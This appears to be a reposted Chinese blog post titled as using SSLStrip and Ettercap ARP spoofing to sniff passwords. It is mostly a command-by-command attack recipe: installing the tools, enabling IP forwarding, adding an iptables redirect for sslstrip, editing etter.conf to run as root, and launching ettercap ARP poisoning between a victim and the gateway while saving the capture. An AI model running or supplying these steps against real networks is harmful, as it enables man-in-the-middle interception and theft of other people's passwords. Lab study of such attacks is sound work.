博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
利用SSLStrip & Ettercap ARP欺骗嗅探密码
阅读量:7103 次
发布时间:2019-06-28

本文共 1246 字,大约阅读时间需要 4 分钟。

apt-get purge ettercap
apt-get purge sslstrip
apt-get install ettercap
apt-get install sslstrip

echo '1' > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080

# from http://blog.csdn.net/ghosttzs

First you need to configure ettecap for sniffing a ssl connection. Open
etter.confand edit the lines:
    
    [privs]
    ec_uid = 65534 # nobody is the default
    ec_gid = 65534 # nobody is the default
    to
    [privs]
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default
    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    to this
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    Next information that you need is the victim ip and the gateway ip. Let's assume that the victim ip is 10.0.0.2 and the gateway is 10.0.0.1:

    ettercap -Tq -i eth0 -M arp:remote /10.0.0.2/ /10.0.0.1/  -w /root/Desktop/HiRoot/test.cap

转载请注明出处

你可能感兴趣的文章
就是这么火!各方大佬谈超融合
查看>>
算算2015年爆出的漏洞总共值多少钱?
查看>>
超融合是快节奏业务环境的必然选择?
查看>>
10个对开发者非常有用的设计原则
查看>>
数据中心的“绿色畅想”
查看>>
WhatsApp创始人转发库克长文 支持抵抗FBI强制令
查看>>
《Oracle高性能自动化运维》一一1.5 小结
查看>>
我是一台服务器,那个家伙像余罪
查看>>
芝麻信用成为中国首家获ISO信息安全认证征信机构
查看>>
用图像识别技术将Instagram 变成可购物的市场 Geenee 完成440万美元A轮融资
查看>>
看一遍你也会做!用英伟达 DIGITS 进行图像分割(下)
查看>>
PC市场衰退:厂商酝酿大变局
查看>>
AC自动机
查看>>
智能家居下一个黄金十年在哪?
查看>>
新IT:催生教育新世界
查看>>
辽宁打造东北大数据产业中心
查看>>
【大数据播报】IT圈儿的“网红”究竟是谁?
查看>>
小巧省电高性能:中科创达用创新技术助力ROLLCAP云台相机上市
查看>>
微软兼并Linkedln的六大作用
查看>>
制造业ERP的核心:生产控制
查看>>